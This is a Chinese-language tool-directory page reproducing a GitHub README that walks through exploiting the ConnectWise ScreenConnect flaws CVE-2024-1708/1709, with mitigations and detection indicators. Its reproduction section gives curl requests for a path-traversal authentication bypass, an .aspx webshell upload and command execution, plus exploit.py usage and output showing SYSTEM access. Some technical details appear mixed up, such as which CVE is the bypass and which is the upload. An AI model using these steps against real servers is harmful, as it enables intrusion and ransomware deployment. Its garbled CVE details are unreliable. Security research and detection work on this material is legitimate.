Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2024-1708-connectwise_rce_reproduction — cve-2024-1708-connectwise_rce_reproduction 的复现 | Kitploit
工具/GitHubGitHub/razureink/cve-2024-1708-connectwise_rce_reproduction
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证学习与教育红队Payload 开发

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
razureink/cve-2024-1708-connectwise_rce_reproduction

cve-2024-1708-connectwise_rce_reproduction

cve-2024-1708-connectwise_rce_reproduction 的复现

查看仓库
27天前尚未审核

CVE-2024-1708 / CVE-2024-1709 — ConnectWise ScreenConnect 身份验证绕过与远程代码执行

CVSS 评分: 8.4 (CVE-2024-1708) – 10.0 (CVE-2024-1709)
CWE: CWE-22(路径遍历)、CWE-288(使用替代路径绕过身份验证)
受影响的软件: ConnectWise ScreenConnect(原 ScreenConnect)≤ 23.9.7
发现与报告时间: 2024 年 2 月
野外被利用情况: LockBit、Black Basta、Bl00dy 及其他勒索软件关联团伙


目录

  1. 概述
  2. 技术细节
  3. 受影响的版本
  4. 复现步骤
  5. 概念验证用法
  6. 缓解措施
  7. 参考资料

1. 概述

CVE-2024-1708 和 CVE-2024-1709 是 ConnectWise ScreenConnect(原 ConnectWise Control)中的一组连环漏洞,二者结合可让未认证的远程攻击者在 ScreenConnect 服务器上实现完全远程代码执行。

  • CVE-2024-1708 — 通过路径遍历绕过身份验证。SetupWizard.aspx 端点(以及相关的 setup/upgrade 端点)未正确清理用户提供的路径遍历序列(../)。未认证的攻击者可以穿越预期的设置目录,访问本应需要身份验证的端点。由于该向导以 SYSTEM(Windows)或 root(Linux)账户上下文运行,攻击者会继承高权限。

  • CVE-2024-1709 — 不受限制的文件上传导致 RCE。一旦身份验证被绕过,攻击者就可以将任意 .aspx 或其他可执行文件上传到 Web 根目录。随后通过请求该上传文件,即可在服务器上执行任意代码。

影响

这些漏洞自 2024 年 2 月 19 日起被多个勒索软件团伙大规模利用:

勒索软件团伙活动说明
LockBit广泛扫描 ScreenConnect 实例;用于在下游部署 LockBit 加密器。
Black Basta利用对 MSP 的访问权限渗透其托管的客户端网络。
Bl00dy针对未修复 ScreenConnect 服务器的小规模攻击活动。

由于 ScreenConnect 通常由托管服务提供商(MSP)部署,用于远程管理数百个下游客户端端点,因此仅一台被入侵的 ScreenConnect 服务器即可引发供应链攻击——所有通过代理连接至该 ScreenConnect 服务器的客户端都面临风险。


2. 技术细节

2.1 身份验证绕过(CVE-2024-1708)

ScreenConnect 服务器在以下路径暴露设置向导:

root@kitploit:~
/SetupWizard.aspx/

在某些升级/修复状态下,服务器不会强制执行身份验证,因为它假设设置向导是首次运行体验。关键缺陷在于,当访问向导命名空间下的路径时,服务器处理 __Session Cookie 或 Transfer-Encoding / Content-Type 请求头的方式。

通过发送如下请求:

root@kitploit:~
/SetupWizard.aspx/../../ScreenConnect/Login.aspx

路径遍历取消了“设置向导”上下文,而服务器仍然认为未认证的会话上下文适用。攻击者会像已认证用户一样被重定向或收到相关页面。

另一种途径:PrepareUpgrade.aspx / PostUpgrade.aspx 处理程序同样缺少身份验证检查,并暴露了文件上传功能。

2.2 远程代码执行(CVE-2024-1709)

一旦攻击者访问到已认证端点(或直接在设置上下文中命中文件上传处理程序),即可上传恶意 .aspx webshell:

root@kitploit:~
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
Content-Type: multipart/form-data; boundary=----BOUNDARY

------BOUNDARY
Content-Disposition: form-data; name="file"; filename="shell.aspx"
Content-Type: application/octet-stream

<%@ Page Language="C#" %>...
------BOUNDARY--

该文件会被写入 Web 应用程序目录(例如 C:\Program Files\ScreenConnect\Website\)。请求该上传的 shell 时,会以服务器身份执行代码。

2.3 根本原因(CWE-22 / CWE-288)

  • 服务器在路由前未能规范化请求路径。
  • SetupWizard.aspx 处理程序信任其路由下的任何请求都属于设置过程,因此应绕过身份验证——但路径遍历打破了这一假设。
  • 未对 ../ 序列或符号链接遍历进行适当验证。

3. 受影响的版本

版本范围状态
23.9.7 及以下易受攻击
23.9.8已修复(2024 年 2 月 20 日发布)
23.9.9已修复
23.9.10(最新)已修复

注意: 自托管(本地部署)的 ScreenConnect 服务器是主要攻击目标。ConnectWise 托管的(云端)ScreenConnect 实例已在公开披露前完成修复,且从未受到影响。


4. 复现步骤

4.1 实验环境搭建

  1. 下载易受攻击的 ScreenConnect 版本(23.9.7 或更早)。
    官方安装程序可能可通过 ConnectWise 合作伙伴存档获取。测试时,请使用隔离的虚拟机。
  2. **在 Windows Server(2019/2022)**或 Linux 主机上安装。
    • 默认安装路径:
      • Windows:C:\Program Files\ScreenConnect\
      • Linux:/opt/screenconnect/
    • 默认 Web 端口:8040(HTTP)或 443(如果配置了 HTTPS)
  3. 确保服务器处于网络隔离状态——测试期间不要暴露到互联网。

4.2 验证漏洞

root@kitploit:~
# 检查版本
curl -s http://<target>:8040/ | Select-String "ScreenConnect"

或访问 Web 界面,在页面源代码中查看版本号。

4.3 路径遍历测试

root@kitploit:~
curl -v --path-as-is "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/Login.aspx"

易受攻击服务器上的预期行为:

  • 响应返回 200 OK 或 302 重定向至一个已通过会话认证的页面,且没有正常的登录提示。
  • 响应可能包含 ScreenConnect 管理控制台 HTML。

4.4 Webshell 上传

root@kitploit:~
curl -X POST "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx" \
  -H "Content-Type: multipart/form-data; boundary=----BOUNDARY" \
  -F "[email protected]"

4.5 执行命令

root@kitploit:~
curl "http://<target>:8040/shell.aspx?cmd=whoami"

5. 概念验证用法

随附的 exploit.py 脚本可自动化执行上述步骤:

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-p PORT] [-c COMMAND] [--ssl]

Exploit CVE-2024-1708/1709 - ConnectWise ScreenConnect Auth Bypass + RCE

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target hostname or IP
  -p PORT, --port PORT  Target port (default: 8040)
  -c COMMAND, --command COMMAND
                        Command to execute (default: whoami)
  --ssl                 Use HTTPS

Example:
  python exploit.py -t 192.168.1.100 -p 8040 -c "whoami"

示例运行

root@kitploit:~
$ python exploit.py -t 192.168.1.100 -c "whoami"

[*] Target: 192.168.1.100:8040
[*] Using SSL: False
[*] Step 1: Testing path traversal for auth bypass...
[+] Target appears vulnerable! Server version: 23.9.7
[*] Step 2: Uploading webshell...
[+] Webshell uploaded to: http://192.168.1.100:8040/PoCsAccSwLgSdE.aspx
[*] Step 3: Executing command 'whoami'...
[+] Output:
nt authority\system

6. 缓解措施

立即修复(补丁)

  • 将 ScreenConnect 升级至 23.9.8 或更高版本。
  • ConnectWise 已于 2024 年 2 月 20 日发布补丁。

补偿性控制

检测

在 Web 服务器日志中搜索以下 IoC:

root@kitploit:~
GET /SetupWizard.aspx/../../ScreenConnect/
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
GET /*.aspx?cmd=

7. 参考资料


免责声明

本仓库仅供教育和授权安全研究使用。对不属于您或未经您明确书面许可的系统进行未授权测试属于违法行为。作者不对本信息的滥用承担任何责任。

下载工具
控制措施实施方案
WAF 规则阻止在 /SetupWizard.aspx/ 之后的 URL 路径中包含 ../ 的请求
网络分段将 ScreenConnect 置于隔离的管理 VLAN 中,并实施严格的出站过滤
访问控制仅允许受信任的 IP 范围访问 ScreenConnect Web 界面
监控对来自外部的 /SetupWizard.aspx/ 请求发出告警,或对 ScreenConnect\Website\ 中意外创建 .aspx 文件发出告警
MFA虽然 MFA 无法阻止此漏洞(身份验证绕过发生在登录之前),但应在所有管理账户上强制启用 MFA 以实现纵深防御
来源URL
NVD - CVE-2024-1708https://nvd.nist.gov/vuln/detail/CVE-2024-1708
NVD - CVE-2024-1709https://nvd.nist.gov/vuln/detail/CVE-2024-1709
ConnectWise 安全公告https://www.connectwise.com/company/trust/security-advisories
Huntress Labs - 初始披露https://www.huntress.com/blog/mass-exploitation-of-connectwise-screenconnect
CISA 已知被利用漏洞https://www.cisa.gov/known-exploited-vulnerabilities
ATT&CK 技术:外部远程服务 (T1133)https://attack.mitre.org/techniques/T1133/